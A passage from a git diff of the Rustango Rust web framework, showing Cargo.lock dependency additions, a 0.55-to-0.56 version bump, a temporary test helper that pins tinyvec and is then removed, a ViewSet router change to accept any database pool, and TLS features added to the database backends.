 version = "0.3.34"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -585,8 +856,10 @@ version = "0.3.34"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "0d50a92467f8ba5dd6e3ee5d4bd04d73ab2e4e1c44474a0674821dfce14b79bc"
 dependencies = [
+ "futures-channel",
  "futures-core",
  "futures-io",
+ "futures-macro",
  "futures-sink",
  "futures-task",
  "memchr",
@@ -602,6 +875,7 @@ checksum = "85649ca51fd72272d7821adaf274ad91c288277713d9c18820d8499a7ff69e9a"
 dependencies = [
  "typenum",
  "version_check",
+ "zeroize",
 ]
 
 [[package]]
@@ -665,6 +939,28 @@ dependencies = [
  "bitflags",
  "ignore",
  "walkdir",
+]
+
+[[package]]
+name = "group"
+version = "0.13.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f0f9ef7462f7c099f518d754361858f86d8a07af53ba9af0fe635bbccb151a63"
+dependencies = [
+ "ff",
+ "rand_core 0.6.4",
+ "subtle",
+]
+
+[[package]]
+name = "half"
+version = "2.7.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6ea2d84b969582b4b1864a92dc5d27cd2b77b622a8d79306834f1be5ba20d84b"
+dependencies = [
+ "cfg-if",
+ "crunchy",
+ "zerocopy",
 ]
 
 [[package]]
@@ -820,7 +1116,7 @@ version = "0.1.20"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "96547c2556ec9d12fb1578c4eaf448b04993e7fb79cbaad930a656880a6bdfa0"
 dependencies = [
- "base64",
+ "base64 0.22.1",
  "bytes",
  "futures-channel",
  "futures-util",
@@ -994,6 +1290,15 @@ dependencies = [
 ]
 
 [[package]]
+name = "inout"
+version = "0.1.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "879f10e63c20629ecabbb64a8010319738c66a5cd0c29b02d63d272b03751d01"
+dependencies = [
+ "generic-array",
+]
+
+[[package]]
 name = "inventory"
 version = "0.3.24"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1007,6 +1312,15 @@ name = "ipnet"
 version = "2.12.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "6a756c3fac73139e83f14c2d742155dd2b78d3ee56597b419a0579b7bdd6dd78"
+
+[[package]]
+name = "itertools"
+version = "0.13.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "413ee7dfc52ee1a4949ceeb7dbc8a33f2d6c088194d9f922fb8318faf1f01186"
+dependencies = [
+ "either",
+]
 
 [[package]]
 name = "itoa"
@@ -1032,6 +1346,33 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "bbd2bcb4c963f2ddae06a2efc7e9f3591312473c50c6685e1f298068316e66fe"
 dependencies = [
  "spin",
+]
+
+[[package]]
+name = "lettre"
+version = "0.11.23"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f2c646bd5cc763b1087b15493e29a64be6147ba8f19342004fa52048ee596eae"
+dependencies = [
+ "async-trait",
+ "base64 0.23.1",
+ "email-encoding",
+ "email_address",
+ "fastrand",
+ "futures-io",
+ "futures-util",
+ "httpdate",
+ "idna",
+ "mime",
+ "nom",
+ "percent-encoding",
+ "quoted_printable",
+ "rustls",
+ "socket2",
+ "tokio",
+ "tokio-rustls",
+ "url",
+ "webpki-roots",
 ]
 
 [[package]]
@@ -1068,6 +1409,12 @@ dependencies = [
  "pkg-config",
  "vcpkg",
 ]
+
+[[package]]
+name = "linux-raw-sys"
+version = "0.12.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "32a66949e030da00e8c7d4434b251670a91556f4144941d37452769c25d58a53"
 
 [[package]]
 name = "litemap"
@@ -1155,6 +1502,42 @@ dependencies = [
 ]
 
 [[package]]
+name = "multer"
+version = "3.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "83e87776546dc87511aa5ee218730c92b666d7264ab6ed41f9d215af9cd5224b"
+dependencies = [
+ "bytes",
+ "encoding_rs",
+ "futures-util",
+ "http",
+ "httparse",
+ "memchr",
+ "mime",
+ "spin",
+ "version_check",
+]
+
+[[package]]
+name = "nom"
+version = "8.0.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "df9761775871bdef83bee530e60050f7e54b1105350d6884eb0fb4f46c2f9405"
+dependencies = [
+ "memchr",
+]
+
+[[package]]
+name = "num-bigint"
+version = "0.4.8"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c89e69e7e0f03bea5ef08013795c25018e101932225a656383bd384495ecc367"
+dependencies = [
+ "num-integer",
+ "num-traits",
+]
+
+[[package]]
 name = "num-bigint-dig"
 version = "0.8.6"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1210,6 +1593,24 @@ name = "once_cell"
 version = "1.21.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "9f7c3e4beb33f85d45ae3e3a1792185706c8e16d043238c593331cc7cd313b50"
+
+[[package]]
+name = "opaque-debug"
+version = "0.3.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c08d65885ee38876c4f86fa503fb49d7b507c2b62552df7c70b2fce627e06381"
+
+[[package]]
+name = "p256"
+version = "0.13.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c9863ad85fa8f4460f9c48cb909d38a0d689dba1f6f6988a5e3e0d31071bcd4b"
+dependencies = [
+ "ecdsa",
+ "elliptic-curve",
+ "primeorder",
+ "sha2",
+]
 
 [[package]]
 name = "parking"
@@ -1348,6 +1749,17 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "b4596b6d070b27117e987119b4dac604f3c58cfb0b191112e24771b2faeac1a6"
 
 [[package]]
+name = "poly1305"
+version = "0.8.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8159bd90725d2df49889a078b54f4f79e87f1f8a8444194cdca81d38f5393abf"
+dependencies = [
+ "cpufeatures 0.2.17",
+ "opaque-debug",
+ "universal-hash",
+]
+
+[[package]]
 name = "potential_utf"
 version = "0.1.6"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1369,6 +1781,15 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "85eae3c4ed2f50dcfe72643da4befc30deadb458a9b590d720cde2f2b1e97da9"
 dependencies = [
  "zerocopy",
+]
+
+[[package]]
+name = "primeorder"
+version = "0.13.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "353e1ca18966c16d9deb1c69278edbc5f194139612772bd9537af60ac231e1e6"
+dependencies = [
+ "elliptic-curve",
 ]
 
 [[package]]
@@ -1455,6 +1876,12 @@ dependencies = [
 ]
 
 [[package]]
+name = "quoted_printable"
+version = "0.5.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "478e0585659a122aa407eb7e3c0e1fa51b1d8a870038bd29f0cf4a8551eea972"
+
+[[package]]
 name = "r-efi"
 version = "5.3.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1493,7 +1920,7 @@ version = "0.10.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "c7f5fa3a058cd35567ef9bfa5e75732bee0f9e4c55fa90477bef2dfcdbc4be80"
 dependencies = [
- "chacha20",
+ "chacha20 0.10.2",
  "getrandom 0.4.3",
  "rand_core 0.10.1",
 ]
@@ -1552,6 +1979,30 @@ dependencies = [
 ]
 
 [[package]]
+name = "redis"
+version = "0.27.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "09d8f99a4090c89cc489a94833c901ead69bfbf3877b4867d5482e321ee875bc"
+dependencies = [
+ "arc-swap",
+ "async-trait",
+ "backon",
+ "bytes",
+ "combine",
+ "futures",
+ "futures-util",
+ "itertools",
+ "itoa",
+ "num-bigint",
+ "percent-encoding",
+ "pin-project-lite",
+ "ryu",
+ "tokio",
+ "tokio-util",
+ "url",
+]
+
+[[package]]
 name = "redox_syscall"
 version = "0.5.18"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1604,7 +2055,7 @@ version = "0.12.28"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "eddd3ca559203180a307f12d114c268abf583f59b03cb906fd0b3ff8646c1147"
 dependencies = [
- "base64",
+ "base64 0.22.1",
  "bytes",
  "futures-core",
  "http",
@@ -1634,6 +2085,16 @@ dependencies = [
  "wasm-bindgen-futures",
  "web-sys",
  "webpki-roots",
+]
+
+[[package]]
+name = "rfc6979"
+version = "0.4.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f8dd2a808d456c4a54e300a23e9f5a67e122c3024119acbfd73e3bf664491cb2"
+dependencies = [
+ "hmac",
+ "subtle",
 ]
 
 [[package]]
@@ -1713,19 +2174,26 @@ name = "rustango"
 version = "0.55.0"
 dependencies = [
  "argon2",
+ "async-stream",
  "async-trait",
  "axum",
- "base64",
+ "base64 0.22.1",
+ "chacha20poly1305",
  "chrono",
+ "ciborium",
  "cookie",
+ "dotenvy",
  "flate2",
  "hmac",
  "http",
  "http-body-util",
  "indexmap",
  "inventory",
+ "lettre",
+ "p256",
  "password-hash",
  "rand 0.8.8",
+ "redis",
  "reqwest",
  "rpassword",
  "rust_decimal",
@@ -1733,9 +2201,11 @@ dependencies = [
  "serde",
  "serde_json",
  "serde_urlencoded",
+ "sha1",
  "sha2",
  "sqlx",
  "subtle",
+ "tempfile",
  "tera",
  "thiserror 1.0.69",
  "time",
@@ -1745,6 +2215,7 @@ dependencies = [
  "tracing",
  "tracing-appender",
  "tracing-subscriber",
+ "urlencoding",
  "uuid",
 ]
 
@@ -1760,18 +2231,19 @@ dependencies = [
 ]
 
 [[package]]
-name = "rustango-showcase"
+name = "rustango-orm-macros"
+version = "0.55.0"
+dependencies = [
+ "rustango",
+ "rustango-macros",
+]
+
+[[package]]
+name = "rustango-renamed-smoke"
 version = "0.0.0"
 dependencies = [
- "axum",
  "chrono",
- "dotenvy",
  "rustango",
- "serde",
- "serde_json",
- "sqlx",
- "tokio",
- "tracing",
 ]
 
 [[package]]
@@ -1781,11 +2253,25 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "6b1e7f9a428571be2dc5bc0505c13fb6bf936822b894ec87abf8a08a4e51742d"
 
 [[package]]
+name = "rustix"
+version = "1.1.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b6fe4565b9518b83ef4f91bb47ce29620ca828bd32cb7e408f0062e9930ba190"
+dependencies = [
+ "bitflags",
+ "errno",
+ "libc",
+ "linux-raw-sys",
+ "windows-sys 0.61.2",
+]
+
+[[package]]
 name = "rustls"
 version = "0.23.43"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "0283386ce02abc0151e1761d08802dfe86c173b0b494af5cbc086574e453da06"
 dependencies = [
+ "log",
  "once_cell",
  "ring",
  "rustls-pki-types",
@@ -1841,6 +2327,20 @@ name = "scopeguard"
 version = "1.2.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "94143f37725109f92c262ed2cf5e59bce7498c01bcc1502d7b9afe439a4e9f49"
+
+[[package]]
+name = "sec1"
+version = "0.7.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d3e97a565f76233a6003f9f5c54be1d9c5bdfa3eccfb189469f11ec4901c47dc"
+dependencies = [
+ "base16ct",
+ "der",
+ "generic-array",
+ "pkcs8",
+ "subtle",
+ "zeroize",
+]
 
 [[package]]
 name = "serde"
@@ -2043,7 +2543,7 @@ version = "0.8.6"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "ee6798b1838b6a0f69c007c133b8df5866302197e404e8b6ee8ed3e3a5e68dc6"
 dependencies = [
- "base64",
+ "base64 0.22.1",
  "bytes",
  "chrono",
  "crc",
@@ -2119,7 +2619,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "aa003f0038df784eb8fecbbac13affe3da23b45194bd57dba231c8f48199c526"
 dependencies = [
  "atoi",
- "base64",
+ "base64 0.22.1",
  "bitflags",
  "byteorder",
  "bytes",
@@ -2164,7 +2664,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "db58fcd5a53cf07c184b154801ff91347e4c30d17a3562a635ff028ad5deda46"
 dependencies = [
  "atoi",
- "base64",
+ "base64 0.22.1",
  "bitflags",
  "byteorder",
  "chrono",
@@ -2292,6 +2792,19 @@ dependencies = [
  "proc-macro2",
  "quote",
  "syn 2.0.119",
+]
+
+[[package]]
+name = "tempfile"
+version = "3.27.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "32497e9a4c7b38532efcdebeef879707aa9f794296a4f0244f6f69e9bc8574bd"
+dependencies = [
+ "fastrand",
+ "getrandom 0.4.3",
+ "once_cell",
+ "rustix",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
@@ -2459,6 +2972,32 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "a3d06f0b082ba57c26b79407372e57cf2a1e28124f78e9479fe80322cf53420b"
 dependencies = [
  "futures-core",
+ "pin-project-lite",
+ "tokio",
+]
+
+[[package]]
+name = "tokio-tungstenite"
+version = "0.29.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8f72a05e828585856dacd553fba484c242c46e391fb0e58917c942ee9202915c"
+dependencies = [
+ "futures-util",
+ "log",
+ "tokio",
+ "tungstenite",
+]
+
+[[package]]
+name = "tokio-util"
+version = "0.7.19"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "494815d09bf52b5548659851081238f0ca39ff638363907596da739561c62c52"
+dependencies = [
+ "bytes",
+ "futures-core",
+ "futures-sink",
+ "libc",
  "pin-project-lite",
  "tokio",
 ]
@@ -2653,6 +3192,22 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "e421abadd41a4225275504ea4d6566923418b7f05506fbc9c0fe86ba7396114b"
 
 [[package]]
+name = "tungstenite"
+version = "0.29.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6c01152af293afb9c7c2a57e4b559c5620b421f6d133261c60dd2d0cdb38e6b8"
+dependencies = [
+ "bytes",
+ "data-encoding",
+ "http",
+ "httparse",
+ "log",
+ "rand 0.9.5",
+ "sha1",
+ "thiserror 2.0.20",
+]
+
+[[package]]
 name = "typenum"
 version = "1.20.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2698,6 +3253,16 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "c6f5d3c3b1bf09027a88a6bc961fc00497d651009560b5463668dc81b0fa87a8"
 
 [[package]]
+name = "universal-hash"
+version = "0.5.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fc1de2c688dc15305988b563c3854064043356019f97a4b46276fe734c4f07ea"
+dependencies = [
+ "crypto-common",
+ "subtle",
+]
+
+[[package]]
 name = "untrusted"
 version = "0.9.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2714,6 +3279,12 @@ dependencies = [
  "percent-encoding",
  "serde",
 ]
+
+[[package]]
+name = "urlencoding"
+version = "2.1.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "daf8dba3b7eb870caf1ddeed7bc9d2a049f3cfdfae7cb521b087cc33ae4c49da"
 
 [[package]]
 name = "utf8_iter"

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -115,7 +115,7 @@ p256 = { version = "0.13", default-features = false, features = ["ecdsa", "std"]
 tera = { version = "1.20", default-features = false }
 
 # Caching
-redis = { version = "0.27", default-features = false, features = ["tokio-comp", "connection-manager"] }
+redis = { version = "0.27", default-features = false, features = ["tokio-comp", "connection-manager", "script"] }
 
 # OAuth2 / OIDC HTTP client (rustls — no openssl footprint)
 reqwest = { version = "0.12", default-features = false, features = ["json", "rustls-tls"] }

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -3,7 +3,7 @@ members = ["crates/*"]
 resolver = "2"
 
 [workspace.package]
-version = "0.55.0"
+version = "0.56.0"
 readme = "README.md"
 edition = "2021"
 rust-version = "1.88"
@@ -18,9 +18,9 @@ categories = ["web-programming::http-server", "database", "asynchronous"]
 # Internal — collapsed shape: one library facade `rustango` (with
 # feature flags for admin / tenancy) plus the proc-macro crate which
 # Rust requires to live separately.
-rustango-macros     = { version = "0.55.0", path = "crates/rustango-macros" }
-rustango-orm-macros = { version = "0.55.0", path = "crates/rustango-orm-macros" }
-rustango            = { version = "0.55.0", path = "crates/rustango" }
+rustango-macros     = { version = "0.56.0", path = "crates/rustango-macros" }
+rustango-orm-macros = { version = "0.56.0", path = "crates/rustango-orm-macros" }
+rustango            = { version = "0.56.0", path = "crates/rustango" }
 
 # Async runtime
 tokio = { version = "1", features = ["macros", "rt-multi-thread", "sync", "signal", "net"] }

--- a/README.md
+++ b/README.md
@@ -21,16 +21,16 @@ Rustango gives you the productivity of Django or Laravel with the speed and type
 ```toml
 [dependencies]
 # Postgres (default)
-rustango = "0.55"
+rustango = "0.56"
 
 # SQLite — file-backed or in-memory
-rustango = { version = "0.55", default-features = false, features = ["sqlite", "tenancy", "admin", "manage"] }
+rustango = { version = "0.56", default-features = false, features = ["sqlite", "tenancy", "admin", "manage"] }
 
 # MySQL 8+
-rustango = { version = "0.55", default-features = false, features = ["mysql", "tenancy", "admin", "manage"] }
+rustango = { version = "0.56", default-features = false, features = ["mysql", "tenancy", "admin", "manage"] }
 ```
 
-Every capability is a cargo feature you can turn off. Renaming the dep works too — `#[derive(Model)]` resolves the crate root via `proc-macro-crate`, so `orm = { package = "rustango", version = "0.55" }` needs no extra wiring.
+Every capability is a cargo feature you can turn off. Renaming the dep works too — `#[derive(Model)]` resolves the crate root via `proc-macro-crate`, so `orm = { package = "rustango", version = "0.56" }` needs no extra wiring.
 
 ## An app on SQLite in 30 lines
 

--- a/crates/cargo-rustango/tests/generated_project_compiles.rs
+++ b/crates/cargo-rustango/tests/generated_project_compiles.rs
@@ -79,6 +79,31 @@ fn generate(template: &str, tag: &str) -> (PathBuf, PathBuf) {
     (work, root)
 }
 
+/// Work around upstream releases that do not compile.
+///
+/// **Temporary. Delete the whole function when the entry below clears.**
+///
+/// Every other build in this repo is protected by a committed `Cargo.lock`,
+/// but a *freshly scaffolded* project has none by definition — it resolves
+/// from scratch, so it picks up whatever was published minutes ago. That is
+/// not a hypothetical: `tinyvec` 1.13.0 shipped a `vec!` call that is not in
+/// scope under `alloc`-without-`std` (upstream Lokathor/tinyvec#225), and it
+/// arrives here four levels down via
+/// `sqlx-postgres → stringprep → unicode-normalization → tinyvec`. Nothing in
+/// the generated project or in rustango can be changed to make it build.
+///
+/// A failure here is ignored on purpose: if the bad version has been yanked or
+/// the dependency graph moved on, `cargo update --precise` errors, and that is
+/// fine — the pin simply is not needed any more.
+fn pin_broken_transitives(root: &Path) {
+    for (krate, good) in [("tinyvec", "1.12.0")] {
+        let _ = Command::new(env!("CARGO"))
+            .current_dir(root)
+            .args(["update", "-p", krate, "--precise", good])
+            .output();
+    }
+}
+
 /// `cargo check` the generated project, returning (compiled, warnings, log).
 ///
 /// Warnings are counted **only for the generated crate**, never for rustango.
@@ -91,6 +116,7 @@ fn generate(template: &str, tag: &str) -> (PathBuf, PathBuf) {
 /// when there is nothing of yours to blame: anything the compiler says about it
 /// is the generator's (#1210).
 fn check(root: &Path, extra: &[&str]) -> (bool, usize, String) {
+    pin_broken_transitives(root);
     let out = Command::new(env!("CARGO"))
         .current_dir(root)
         .args(["check", "--message-format=json-diagnostic-rendered-ansi"])

--- a/crates/cargo-rustango/tests/generated_project_compiles.rs
+++ b/crates/cargo-rustango/tests/generated_project_compiles.rs
@@ -79,31 +79,6 @@ fn generate(template: &str, tag: &str) -> (PathBuf, PathBuf) {
     (work, root)
 }
 
-/// Work around upstream releases that do not compile.
-///
-/// **Temporary. Delete the whole function when the entry below clears.**
-///
-/// Every other build in this repo is protected by a committed `Cargo.lock`,
-/// but a *freshly scaffolded* project has none by definition — it resolves
-/// from scratch, so it picks up whatever was published minutes ago. That is
-/// not a hypothetical: `tinyvec` 1.13.0 shipped a `vec!` call that is not in
-/// scope under `alloc`-without-`std` (upstream Lokathor/tinyvec#225), and it
-/// arrives here four levels down via
-/// `sqlx-postgres → stringprep → unicode-normalization → tinyvec`. Nothing in
-/// the generated project or in rustango can be changed to make it build.
-///
-/// A failure here is ignored on purpose: if the bad version has been yanked or
-/// the dependency graph moved on, `cargo update --precise` errors, and that is
-/// fine — the pin simply is not needed any more.
-fn pin_broken_transitives(root: &Path) {
-    for (krate, good) in [("tinyvec", "1.12.0")] {
-        let _ = Command::new(env!("CARGO"))
-            .current_dir(root)
-            .args(["update", "-p", krate, "--precise", good])
-            .output();
-    }
-}
-
 /// `cargo check` the generated project, returning (compiled, warnings, log).
 ///
 /// Warnings are counted **only for the generated crate**, never for rustango.
@@ -116,7 +91,6 @@ fn pin_broken_transitives(root: &Path) {
 /// when there is nothing of yours to blame: anything the compiler says about it
 /// is the generator's (#1210).
 fn check(root: &Path, extra: &[&str]) -> (bool, usize, String) {
-    pin_broken_transitives(root);
     let out = Command::new(env!("CARGO"))
         .current_dir(root)
         .args(["check", "--message-format=json-diagnostic-rendered-ansi"])

--- a/crates/rustango-macros/src/lib.rs
+++ b/crates/rustango-macros/src/lib.rs
@@ -12530,7 +12530,16 @@ fn expand_viewset(input: &DeriveInput) -> syn::Result<TokenStream2> {
         impl #struct_name {
             /// Build an `axum::Router` with the six standard REST endpoints
             /// for this ViewSet, mounted at `prefix`.
-            pub fn router(prefix: &str, pool: #root::sql::sqlx::PgPool) -> #root::__axum::Router {
+            ///
+            /// Accepts any backend's pool — a `sqlx::PgPool`,
+            /// `SqlitePool`, `MySqlPool`, or the [`rustango::sql::Pool`]
+            /// enum — because they all `Into<Pool>` (#1273). This is why
+            /// the derive no longer names `PgPool`, which would not
+            /// exist on a project built without the `postgres` feature.
+            pub fn router(
+                prefix: &str,
+                pool: impl ::core::convert::Into<#root::sql::Pool>,
+            ) -> #root::__axum::Router {
                 #root::viewset::ViewSet::for_model(
                     <#model_path as #root::core::Model>::SCHEMA
                 )
@@ -12542,7 +12551,7 @@ fn expand_viewset(input: &DeriveInput) -> syn::Result<TokenStream2> {
                     #perms_call
                     #read_only_call
                     #serializer_call
-                    .router(prefix, pool)
+                    .router_pool(prefix, pool.into())
             }
         }
     })

--- a/crates/rustango-renamed-smoke/Cargo.toml
+++ b/crates/rustango-renamed-smoke/Cargo.toml
@@ -55,5 +55,5 @@ tenancy = ["orm/tenancy"]
 #   through orm — no direct dep needed.
 # - `uuid` — routed through `__uuid` — no direct dep needed.
 # - `rust_decimal` — 1 site; not yet routed (future follow-up).
-orm = { package = "rustango", path = "../rustango", version = "0.55.0" }
+orm = { package = "rustango", path = "../rustango", version = "0.56.0" }
 chrono = { workspace = true }

--- a/crates/rustango/Cargo.toml
+++ b/crates/rustango/Cargo.toml
@@ -486,7 +486,7 @@ runserver = ["_axum"]
 
 [dependencies]
 # Proc-macros — separate by Rust language requirement.
-rustango-macros = { version = "0.55.0", path = "../rustango-macros" }
+rustango-macros = { version = "0.56.0", path = "../rustango-macros" }
 
 # Always-on: core ORM + query layer + SQL writer + migration runner.
 chrono       = { workspace = true }

--- a/crates/rustango/Cargo.toml
+++ b/crates/rustango/Cargo.toml
@@ -62,7 +62,13 @@ default = ["postgres", "batteries"]
 # `cargo rustango new` emits exactly that. Keeping the list here rather than in
 # the generated manifest means it can't rot out of sync with `default`.
 batteries = ["manage", "admin", "config", "forms", "serializer", "cache", "signals", "email", "storage", "scheduler", "secrets", "totp", "webhook", "webhook-delivery", "api_keys", "passwords", "signed_url", "notifications", "casts", "jobs", "jobs-postgres", "auth_flows", "sse", "websocket", "oauth2", "http-client", "compression", "openapi", "csp-nonce", "sessions", "hmac-auth", "jwt", "uploads", "storage-s3", "media", "runserver", "template_views"]
-postgres = ["sqlx/postgres"]
+# `tls-rustls` (→ rustls-ring + webpki roots, no openssl — matching the
+# reqwest / lettre stance) is folded in because a NETWORK database backend
+# is useless without it: every managed Postgres (Supabase, Neon, RDS,
+# Cloud SQL, …) mandates TLS, and sqlx built with no TLS backend cannot
+# honour `sslmode=require` — the handshake just fails. SQLite deliberately
+# stays TLS-free (local file, no socket).
+postgres = ["sqlx/postgres", "sqlx/tls-rustls"]
 
 # Unified `cargo run` / `cargo run -- <verb>` dispatcher. Pulls the
 # minimum axum + tokio surface so bare-API projects (without admin)
@@ -90,7 +96,7 @@ testkit = []
 # Serializer) works against MySQL through the same `&Pool` API as
 # Postgres. Schema-mode tenancy remains Postgres-only by language
 # semantics (`SET search_path` has no MySQL equivalent).
-mysql = ["sqlx/mysql"]
+mysql = ["sqlx/mysql", "sqlx/tls-rustls"]
 
 # SQLite 3.35+ backend. Fully tri-dialect since v0.38: every framework
 # surface works against a file-backed or in-memory SQLite DB through

--- a/crates/rustango/examples/admin_demo/Cargo.lock
+++ b/crates/rustango/examples/admin_demo/Cargo.lock
@@ -2510,9 +2510,9 @@ dependencies = [
 
 [[package]]
 name = "tinyvec"
-version = "1.12.0"
+version = "1.13.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bb4ebadaa0af04fab11ae01eb5f9fdb5f9c5b875506e210e71c07873528baa7f"
+checksum = "22e6cd18156ba6530d7deea039a6c1a6ec4f173dd330a9a53a4ea569fe85abac"
 dependencies = [
  "tinyvec_macros",
 ]

--- a/crates/rustango/examples/admin_demo/Cargo.lock
+++ b/crates/rustango/examples/admin_demo/Cargo.lock
@@ -9,6 +9,29 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "320119579fcad9c21884f5c4861d16174d0e06250625266f50fe6898340abefa"
 
 [[package]]
+name = "admin_demo"
+version = "0.1.0"
+dependencies = [
+ "axum",
+ "chrono",
+ "dotenvy",
+ "rustango",
+ "serde",
+ "serde_json",
+ "tokio",
+]
+
+[[package]]
+name = "aead"
+version = "0.5.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d122413f284cf2d62fb1b7db97e02edb8cda96d769b16e443a4f6195e35662b0"
+dependencies = [
+ "crypto-common",
+ "generic-array",
+]
+
+[[package]]
 name = "aho-corasick"
 version = "1.1.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -89,6 +112,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "31b698c5f9a010f6573133b09e0de5408834d0c82f8d7475a89fc1867a71cd90"
 dependencies = [
  "axum-core",
+ "base64",
  "bytes",
  "form_urlencoded",
  "futures-util",
@@ -101,14 +125,17 @@ dependencies = [
  "matchit",
  "memchr",
  "mime",
+ "multer",
  "percent-encoding",
  "pin-project-lite",
  "serde_core",
  "serde_json",
  "serde_path_to_error",
  "serde_urlencoded",
+ "sha1",
  "sync_wrapper",
  "tokio",
+ "tokio-tungstenite",
  "tower",
  "tower-layer",
  "tower-service",
@@ -247,6 +274,17 @@ checksum = "f079e83a288787bcd14a6aea84cee5c87a67c5a3e660c30f557a3d24761b3527"
 
 [[package]]
 name = "chacha20"
+version = "0.9.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c3613f74bd2eac03dad61bd53dbe620703d4371614fe0bc3b9f04dd36fe4e818"
+dependencies = [
+ "cfg-if",
+ "cipher",
+ "cpufeatures 0.2.17",
+]
+
+[[package]]
+name = "chacha20"
 version = "0.10.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "65c35e4b699c7e15ccbe7ee35c005e4fc0a278d22238a2857e6ce2dadeda1b06"
@@ -254,6 +292,19 @@ dependencies = [
  "cfg-if",
  "cpufeatures 0.3.1",
  "rand_core 0.10.1",
+]
+
+[[package]]
+name = "chacha20poly1305"
+version = "0.10.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "10cd79432192d1c0f4e1a0fef9527696cc039165d729fb41b3f4f4f354c2dc35"
+dependencies = [
+ "aead",
+ "chacha20 0.9.1",
+ "cipher",
+ "poly1305",
+ "zeroize",
 ]
 
 [[package]]
@@ -266,6 +317,17 @@ dependencies = [
  "num-traits",
  "serde",
  "windows-link",
+]
+
+[[package]]
+name = "cipher"
+version = "0.4.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "773f3b9af64447d2ce9850330c473515014aa235e6a783b02db81ff39e4a3dad"
+dependencies = [
+ "crypto-common",
+ "inout",
+ "zeroize",
 ]
 
 [[package]]
@@ -382,8 +444,15 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "78c8292055d1c1df0cce5d180393dc8cce0abec0a7102adb6c7b1eef6016d60a"
 dependencies = [
  "generic-array",
+ "rand_core 0.6.4",
  "typenum",
 ]
+
+[[package]]
+name = "data-encoding"
+version = "2.11.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4583a4551df46e2792f82ceeac45e850d2e2d5debba0b91f102385cda5b11f06"
 
 [[package]]
 name = "der"
@@ -441,6 +510,15 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "252afb9ae5eaa683babdc6a068b3f5726eb19e05070c731f9b2a23a7c3e8ed34"
 dependencies = [
  "serde",
+]
+
+[[package]]
+name = "encoding_rs"
+version = "0.8.35"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "75030f3c4f45dafd7586dd6780965a8c7e8e285a5ecb86713e63a79c5b2766f3"
+dependencies = [
+ "cfg-if",
 ]
 
 [[package]]
@@ -994,6 +1072,15 @@ dependencies = [
 ]
 
 [[package]]
+name = "inout"
+version = "0.1.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
